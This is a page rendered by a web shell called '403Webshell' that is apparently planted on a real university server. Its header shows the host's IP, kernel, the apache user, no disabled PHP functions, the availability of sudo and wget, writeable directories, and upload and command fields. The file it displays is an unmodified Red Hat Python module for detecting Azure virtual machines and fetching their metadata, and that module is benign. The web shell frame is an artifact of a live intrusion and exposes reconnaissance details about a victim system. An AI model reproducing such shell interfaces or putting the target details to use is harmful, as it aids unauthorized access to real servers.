403Webshell
Server IP : 172.24.0.40  /  Your IP : 216.73.216.10
Web Server : Apache
System : Linux dbweb26.ust.edu.ph 4.18.0-513.5.1.el8_9.x86_64 #1 SMP Fri Sep 29 05:21:10 EDT 2023 x86_64
User : apache ( 48)
PHP Version : 8.2.18
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/lib64/python3.6/site-packages/cloud_what/providers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/lib64/python3.6/site-packages/cloud_what/providers/azure.py
# -*- coding: utf-8 -*-
#
# Copyright (c) 2020 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#


"""
This is module implementing detector and metadata collector of virtual machine running on Azure
"""

import logging
import json
from typing import Union, List
from shutil import which

from cloud_what._base_provider import BaseCloudProvider


log = logging.getLogger(__name__)


class AzureCloudProvider(BaseCloudProvider):
    """
    Base class for Azure cloud provider
    """

    CLOUD_PROVIDER_ID = "azure"

    # Microsoft adds new API versions very often, but old versions are supported
    # for very long time. It would be good to update the version from time to time,
    # because old versions (three years) are deprecated. It would be good to update
    # the API version with every minor version of RHEL
    API_VERSION = "2021-02-01"

    BASE_CLOUD_PROVIDER_METADATA_URL = "http://169.254.169.254/metadata/instance?api-version="

    CLOUD_PROVIDER_METADATA_URL = BASE_CLOUD_PROVIDER_METADATA_URL + API_VERSION

    CLOUD_PROVIDER_METADATA_TYPE = "application/json"

    BASE_CLOUD_PROVIDER_SIGNATURE_URL = "http://169.254.169.254/metadata/attested/document?api-version="

    CLOUD_PROVIDER_SIGNATURE_URL = BASE_CLOUD_PROVIDER_SIGNATURE_URL + API_VERSION

    CLOUD_PROVIDER_SIGNATURE_TYPE = "application/json"

    AZURE_API_VERSIONS_URL = "http://169.254.169.254/metadata/versions"

    METADATA_CACHE_FILE = None

    SIGNATURE_CACHE_FILE = None

    # HTTP header "Metadata" has to be equal to "true" to be able to get metadata
    HTTP_HEADERS = {
        'User-Agent': 'cloud-what/1.0',
        "Metadata": "true"
    }

    # Increased timeout for Azure, because response can have long delay, when wrong
    # or too old API_VERSION is used.
    TIMEOUT = 10.0

    def __init__(self, hw_info):
        """
        Initialize instance of AzureCloudDetector
        """
        super(AzureCloudProvider, self).__init__(hw_info)

    def is_running_on_cloud(self):
        """
        Try to guess if cloud provider is Azure using collected hardware information (output of dmidecode,
        virt-what, etc.)
        :return: True, when we detected sign of Azure in hardware information; Otherwise return False
        """

        # The system has to be VM
        if self.is_vm() is False:
            return False
        # This is valid for virtual machines running on Azure
        if 'dmi.chassis.asset_tag' in self.hw_info and \
                self.hw_info['dmi.chassis.asset_tag'] == '7783-7084-3265-9085-8269-3286-77':
            return True
        # In other cases return False
        return False

    def is_likely_running_on_cloud(self):
        """
        Return non-zero value, when the machine is virtual machine and it is running on Hyper-V and
        some Microsoft string can be found in output of dmidecode
        :return: Float value representing probability that vm is running on Azure
        """
        probability = 0.0

        # When the machine is not virtual machine, then there is probably zero chance that the machine
        # is running on Azure
        if self.is_vm() is False:
            return 0.0

        # We know that Azure uses only HyperV
        if 'virt.host_type' in self.hw_info:
            if 'hyperv' in self.hw_info['virt.host_type']:
                probability += 0.3

        if 'dmi.chassis.asset_tag' in self.hw_info and \
                self.hw_info['dmi.chassis.asset_tag'] == '7783-7084-3265-9085-8269-3286-77':
            probability += 0.3

        # The waagent is installed
        if self._has_azure_linux_agent() is True:
            probability += 0.3

        # Try to find "Azure" or "Microsoft" keywords in output of dmidecode
        found_microsoft = False
        found_azure = False
        for hw_item in self.hw_info.values():
            if type(hw_item) is not str:
                continue
            if 'microsoft' in hw_item.lower():
                found_microsoft = True
            elif 'azure' in hw_item.lower():
                found_azure = True
        if found_microsoft is True:
            probability += 0.3
        if found_azure is True:
            probability += 0.1

        return probability

    def get_api_versions(self) -> Union[List[str], None]:
        """
        This method tries to get list of API versions currently supported by Azure cloud provider
        :return: list of API versions or None
        """
        api_versions_str = self._get_data_from_server("api_versions", self.AZURE_API_VERSIONS_URL)
        api_versions = None
        try:
            api_versions_dict = json.loads(api_versions_str)
        except TypeError as err:
            log.error(f'Unable to decode Azure API versions: {err}')
        else:
            if 'apiVersions' in api_versions_dict:
                api_versions = api_versions_dict['apiVersions']
        return api_versions

    def _has_azure_linux_agent(self):
        """
        Determine, if the waagent is installed. The waagent manages Linux & FreeBSD provisioning
        on Azure. See: https://docs.microsoft.com/en-us/azure/virtual-machines/extensions/agent-linux
        :return: True if waagent is installed
        """
        return which('waagent') is not None

    def _fix_supported_api_version(self) -> Union[str, None]:
        """
        Try to get list of supported API versions and set the oldest
        :return:
        """
        api_versions = self.get_api_versions()
        if api_versions is not None and len(api_versions) > 0:
            if self.API_VERSION not in api_versions:
                log.warning(
                    f'Current Azure IMDS API version {self.API_VERSION} not included in the list of '
                    f'supported API versions: {api_versions}'
                )
            else:
                log.warning(f'Current Azure IMDS API version {self.API_VERSION} not fully supported')
            # Get newest version
            api_version = api_versions[-1]
            log.warning(f'Changing Azure IMDS API version to: {api_version}')
            self.API_VERSION = api_version
            # Fix URL for gathering metadata and signature
            self.CLOUD_PROVIDER_METADATA_URL = self.BASE_CLOUD_PROVIDER_METADATA_URL + api_version
            self.CLOUD_PROVIDER_SIGNATURE_URL = self.BASE_CLOUD_PROVIDER_SIGNATURE_URL + api_version
            return api_version
        return None

    def _get_metadata_from_cache(self) -> Union[str, None]:
        """
        It is not safe to use cache of metadata for Azure cloud provider
        :return: None
        """
        return None

    def _get_data_from_server(self, data_type: str, url: str, headers: dict = None) -> Union[str, None]:
        """
        This method tries to get data from server using GET method
        :param data_type: string representation of data type used in log messages (e.g. "metadata", "signature")
        :param url: URL of GET request
        :return: String of body, when request was successful; otherwise return None
        """
        return super(AzureCloudProvider, self)._get_data_from_server(data_type, url, headers)

    def _get_metadata_from_server(self) -> Union[str, None]:
        """
        Try to get metadata from server
        :return: String with metadata or None
        """
        metadata = super(AzureCloudProvider, self)._get_metadata_from_server()
        # When it wasn't possible to get metadata with current API version, then try to get list of
        # supported API versions and select the newest version and try to get metadata once again
        if metadata is None:
            api_version = self._fix_supported_api_version()
            if api_version is not None:
                metadata = super(AzureCloudProvider, self)._get_metadata_from_server()
        return metadata

    def _get_signature_from_cache_file(self) -> Union[str, None]:
        """
        It is not safe to use cache of signature for Azure cloud provider
        :return: None
        """
        return None

    def _get_signature_from_server(self) -> Union[str, None]:
        """
        Method for gathering signature of metadata from server
        :return: String containing signature or None
        """
        signature = super(AzureCloudProvider, self)._get_signature_from_server()
        if signature is None:
            api_version = self._fix_supported_api_version()
            if api_version is not None:
                signature = super(AzureCloudProvider, self)._get_signature_from_server()
        return signature

    def get_signature(self) -> Union[str, None]:
        """
        Public method for getting signature (cache file or server)
        :return: String containing signature or None
        """
        return super(AzureCloudProvider, self).get_signature()

    def get_metadata(self) -> Union[str, None]:
        """
        Public method for getting metadata (cache file or server)
        :return: String containing metadata or None
        """
        return super(AzureCloudProvider, self).get_metadata()


def _smoke_tests():
    """
    Simple smoke test of azure detector and collector
    :return: None
    """
    # Gather only information about hardware and virtualization
    from rhsmlib.facts.host_collector import HostCollector

    import sys

    root = logging.getLogger()
    root.setLevel(logging.DEBUG)

    handler = logging.StreamHandler(sys.stdout)
    handler.setLevel(logging.DEBUG)
    formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
    handler.setFormatter(formatter)
    root.addHandler(handler)

    facts = {}
    facts.update(HostCollector().get_all())
    azure_cloud_provider = AzureCloudProvider(facts)
    result = azure_cloud_provider.is_running_on_cloud()
    probability = azure_cloud_provider.is_likely_running_on_cloud()
    print('>>> debug <<< result: %s, %6.3f' % (result, probability))

    if result is True:
        metadata = azure_cloud_provider.get_metadata()
        signature = azure_cloud_provider.get_signature()
        print(f'>>> debug <<< metadata: {metadata}')
        print(f'>>> debug <<< signature: {signature}')
        api_versions = azure_cloud_provider.get_api_versions()
        print(f'>>> debug <<< api_versions: {api_versions}')

        # Test getting metadata and signature with too old API version
        AzureCloudProvider.API_VERSION = '2011-01-01'
        AzureCloudProvider.CLOUD_PROVIDER_METADATA_URL = \
            "http://169.254.169.254/metadata/instance?api-version=2011-01-01"
        AzureCloudProvider.CLOUD_PROVIDER_SIGNATURE_URL = \
            "http://169.254.169.254/metadata/attested/document?api-version=2011-01-01"
        azure_cloud_provider = AzureCloudProvider({})
        azure_cloud_provider._cached_metadata = None
        azure_cloud_provider._cached_signature = None
        metadata = azure_cloud_provider.get_metadata()
        print(f'>>> debug <<< metadata: {metadata}')
        signature = azure_cloud_provider.get_signature()
        print(f'>>> debug <<< signature: {signature}')


# Some temporary smoke testing code. You can test this module using:
# sudo PYTHONPATH=./src python3 -m cloud_what.providers.azure
if __name__ == '__main__':
    _smoke_tests()

Youez - 2016 - github.com/yon3zu
LinuXploit